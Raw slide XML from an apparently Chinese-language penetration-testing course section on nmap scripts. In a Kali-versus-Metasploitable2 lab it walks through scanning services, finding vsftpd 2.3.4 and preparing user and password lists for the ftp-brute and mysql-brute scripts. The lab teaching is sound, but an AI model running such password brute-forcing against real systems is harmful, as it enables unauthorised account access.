                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="文本框 103"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4869180" y="548640"/>
            <a:ext cx="6680200" cy="2306955"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>本次实验我们使用ftp-brute.nse和mysql-brute.nse，分别位于：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>/usr/share/nmap/scripts/ftp-brute.nse/usr/share/nmap/scripts/mysql-brute.nse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>利用脚本进行Ftp弱密码扫描的具体过程如下：1.该步骤中靶机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Metasploitable2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击机均使用主机模式，并能正常通信，其中Kaili的IP地址为：192.168.172.128，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0">
                <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Metasploitable2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的地址为192.168.172.131。首先扫描目标主机开启的网络服务，如图2-3-5所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539740" y="2855278"/>
            <a:ext cx="5276850" cy="3181350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="文本框 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5539740" y="6100128"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="0" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-5 扫描网络服务</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293331" y="3709982"/>
              <a:ext cx="3396615" cy="306879"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>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100000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>FTP弱密码扫描</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="Segoe UI Semilight" panose="020B0402040204020203" pitchFamily="34" charset="0"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="文本框 573"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7293450" y="3377688"/>
              <a:ext cx="868680" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>步骤一</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="文本框 574"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667040" y="3537851"/>
              <a:ext cx="450850" cy="368509"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FFF9E6"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFF9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="标题 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="480060" y="713740"/>
            <a:ext cx="3855085" cy="864235"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" sz="4400">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>【项目实施】</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="4400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5715" y="127635"/>
            <a:ext cx="367030" cy="388620"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="012D86"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="0E2557"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
          </a:gra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6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="403860" y="127635"/>
            <a:ext cx="76200" cy="387985"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="0070C0"/>
          </a:soli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12" name="文本占位符 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522605" y="57150"/>
            <a:ext cx="5081905" cy="558165"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1055"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:defRPr sz="2955" b="1" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="723265" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2530" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1205230" indent="-241300" algn="l" defTabSz="963930" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="525"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2110" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="168783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4pPr>
            <a:lvl5pPr marL="216979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5pPr>
            <a:lvl6pPr marL="26517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6pPr>
            <a:lvl7pPr marL="31343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7pPr>
            <a:lvl8pPr marL="361632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8pPr>
            <a:lvl9pPr marL="409829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9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>2.3.2 nmap脚本的使用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" sz="3600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent5"/>
              </a:solidFill>
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="文本框 104"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5348605" y="1385888"/>
            <a:ext cx="5080000" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="304800"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>2.可以发现靶机开启了FTP服务，该服务是vsftpd 2.3.4。下面进行使用ftp-brute脚本进行暴力破解前的准备，新建一个用户列表和密码列表，其内容如图2-3-6所示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5348605" y="2584768"/>
            <a:ext cx="3800475" cy="2095500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="106" name="文本框 105"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5348605" y="4680268"/>
            <a:ext cx="5080000" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr indent="266700" algn="l"/>
            <a:r>
              <a:rPr lang="zh-CN" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>图2-3-6 用户列表和密码列表</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="8" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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组合 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="479781" y="2216574"/>
            <a:ext cx="4062095" cy="638810"/>
            <a:chOff x="6627851" y="3377688"/>
            <a:chExt cx="4062095" cy="639173"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="矩形: 圆角 27"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6627851" y="3493208"/>
              <a:ext cx="457200" cy="457200"/>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F9E6"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="矩形 8" descr="e7d195523061f1c003d7160bb3852330e69e1b47c664ea0314E9593E18313AD830F940F1AC53C40C0B8B3D93D4DFF44B590F8D4A945ADE53F5D61968231FCAE157B0D7022AA0681C03E9FB4B1E3862D0C13C109685D0C1F9D9ACA5E10B258C1727924FC3FC0E61468152E413AFD3EDAA03A1BA0B768D2D39A9D26D6009DD7E2AED15C90B1EA11F84"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
